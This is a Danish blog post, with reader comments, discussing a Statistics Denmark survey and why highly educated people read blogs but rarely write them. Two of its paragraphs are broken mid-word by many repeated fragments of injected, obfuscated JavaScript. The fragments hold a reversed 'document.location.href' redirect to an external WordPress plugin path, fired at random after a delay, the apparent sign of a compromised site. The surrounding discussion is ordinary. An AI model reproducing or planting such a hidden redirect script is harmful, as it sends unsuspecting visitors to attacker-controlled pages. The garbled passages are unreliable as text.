Hvorfor blogger de kloge ikke?

Skema som viser brug af bl.a. blogs og IM i forskellige befolkningsgrupper

Danmarks Statistik har udarbejdet en lille undersøgelse om brugen af internettet til kommunikation, dvs. tjenester og redskaber som messenger, chat, forummer og blogs.

Nogle af dem, der er flittige til at IM´e og “bruge opkald med webcam” er folk med grundskoleuddannelse. De er også nogle af de ivrigste til at blogge. Ca. 10 % i denne gruppe bruger blogs mod kun 9% i gruppen af personer med ungdomsuddannelser og videregående uddannelser. Til gengæld er dem med videregående uddannelse nogle af de hyppigste bloglæsere. 26% læser blogs mod kun 20% i de øvrige grupper. Højtuddannede er heller ikke på niveau med grundskolefolkene når det kommer til brug af webcams og IM. Forskellene er måske nok ikke enorme, men de er der.

Der er måske ikke den stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore forskel på om 9 eller 10% i en gruppe blogger. Men det er alligevel interessant, at akademikere – som ellers er et meget skrivende folkefærd – kun i så begrænset omfang har taget de nye medier til sig. Hvorfor skriver de ikke – når de nu læser blogs?

Måske er en del af forklaringen, at bloggen er omtrent det modsatte af, hvad vi lærte på universitetet. Det er ikke meningen med en blog, at man fx skal redegøre for teori, metoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tode etc. før man giver sig i kast med en given substans. Tværtimod indeholder bloggen “work-in-progress” og endda i relativt korte indlæg. Den er et godt redskab til at dele processer – også intellektuelle processer – med sin omverden, før man er nået frem til de endelige konklusioner, der skal publiceres i en afhandling eller artikel. Traditionel publicering retter sig ikke i så høj grad mod processen “at skabe ny viden”. Fokus er i højere grad på produktet – den opnåede viden – som man først skal delagtiggøre andre i, når den er helt færdig og der er læst korrektur på alle noterne. Når man er nået hertil, kan man naturligvis også godt redegøre for processen – men først når den er færdig. Måske handler det også om meritering? Angst for, at andre “overtager” éns ideer og teorier? HVIS det forholder sig sådan, er det måske ikke den bedste måde at generere ny viden på.

Ihvertfald bliver det spændende at følge udviklingen, for fremtidens højtuddannede, de studerende, vil hjertens gerne blogge. De er ganske enkelt de mest digitalt mindede af alle. De blogger, chatter, IM´er m.m. mere end alle andre. Men om de så også gør det fagligt, dét siger undersøgelsen desværre ikke noget om.

3 comments to “Hvorfor blogger de kloge ikke?”
  1. Godt gået Charlotte! Det er en god problemstilling du rejser og fine overvejelser.
    Men. Er oplysningen om at 9-10 % af befolkningen mellem 15 og 89 år skulle blogge rigtig? Mit kendskab til nettet siger mig, at der ikke er 440.000 blogge derude af den type, hvor folk har en fast side og hvor de løbende over længere tid kommenterer livet og dagens begivenheder. Ikke engang hvis vi tager dem med, som automatisk kan blive genereret hos Facebook m.v.
    Ved at gå til originalmaterialet hos Danmarks Statistik – dokumentation og tallene ser det ud til, at det som Charlotte (og i hvert fald Politikens internetudgave d. 26. ses her )opfatter som at blogge ikke er det samme som det, statistikfolkene har fået ud af det. De beskæftiger sig med at “Læse og/eller kommentere en weblog”.
    Så har vi en helt anden situation – stadig hvis tallene holder – nemlig, at 22 % læser andres weblogs og at ca. 10 % kommenterer på andres (og egne) weblogs.
    Nu har Danmarks Statistik kun offentliggjort nogle enkelte af tallene fra undersøgelsen, så det er svært at vurdere tallenes validitet. Oplysningerne er kommet ind via telefoninterviews (65 % svarprocent) kombineret med webskema (som mærkeligt nok ikke er offentliggjort). Jeg tvivler f.eks. på, at størsteparten af befolkningen ved hvad “instant messaging” og “VOIP” er. Herved er undersøgelsen meget afhængig af telefoninterviewerne – altså at resultatet måske mere er et billede af hvad telefoninterviewerne mener. I hvert fald har de 1.518 gennemførte interviews ikke svaret på alle spørgsmål, og de ubesvarede spørgsmål er efterfølgende statistisk blevet “fyldt ud”. Denne statistiske fejlkilde er heller ikke angivet i det publicerede materiale.
    Tilbage til bloggene. Vi har altså at 10 % af befolkningen kommenterer på blogge, og det svarer vel nogenlunde til andelen af befolkningen, som skriver læserbreve i aviser. Forskellen til læserbreve er, at alle indlæg bliver bragt. Det er godt. Dog er det skidt, at de sjældent bliver læst, i modsætning til de læserbreve, som slap igennem redaktionens nåleøje til en større offentlighed, som de trykte medier trods alt kan levere.
    Blogge er en udvidelse af vores muligheder, og jeg mener da også helt sikkert, at de er gode. Jeg har da også et par velbesøgte stykker selv, f.eks. Videnssamfundet (annonce), som endda besøges af journalister hen ad vejen, så de dokumenterbart er en del af fødekæden. Selv orker jeg jævnligt kun at besøge 5-6 stykker, som jeg ved leverer en værdi, og så dukker der link op i mail og på nettet til indlæg til andre blogge i ny og næ. Tilfældig leden efter nåle i høstakke vil jeg overlade til invalidepensionister og andre, som har tid til meget spildtid. Der er andre og bedre steder at hente information, f.eks. i redigerede medier.

  2. Ja, jeg ville egentlig også gerne have set nogen tal for, hvor mange der “blogger” ved at have deres EGEN blog eller ved at skrive primære indlæg på en fællesblog som fx den fortræffelige formidlingsnet.dk. For jeg er enig med dig i, at der selvfølgelig nok ikke er ca. 400.000 blogs. Jeg har heller ikke talt efter, men også mit øjemål siger mig, at det nok er lige i overkanten 😉

    Men jeg synes måske heller ikke, at det rykker så meget ved problemstillingen, om man har sin egen blog og bruger mediet “primært” eller om man “blogger sekundært” – altså ved at kommentere? Man har naturligvis heller ikke tid til “nålen-i-høstakken” som du er inde på Jørgen. Mængden af blogs er overvældende og relevansen stærkt svingende for de emner, man gerne vil vidensudvikle omkring.

    Men stadigvæk – hvorfor er bloggen som medie ikke en mere anvendt og accpteret publiceringsform? Hvorfor skriver folk med videregående uddannelse ikke – på den ene elelr den anden måde – blogs? Er det fordi der (som du måske antyder) også i reglen er tale om et uredigeret medie? Giver det bloggen et skær af manglende seriøsitet? (Det er jo i så fald ret let at løse) Eller er der i den akademiske kultur nogle forhold, som gør, at videndeling og vidensudvikling på denne meget offentlige måde er vanskelig? Eller er det manglende kendskab til – og fortrolighed med – selve teknologien?

  3. Pingback: Akademikere blogger » Det lille sekretariat

Skriv et svar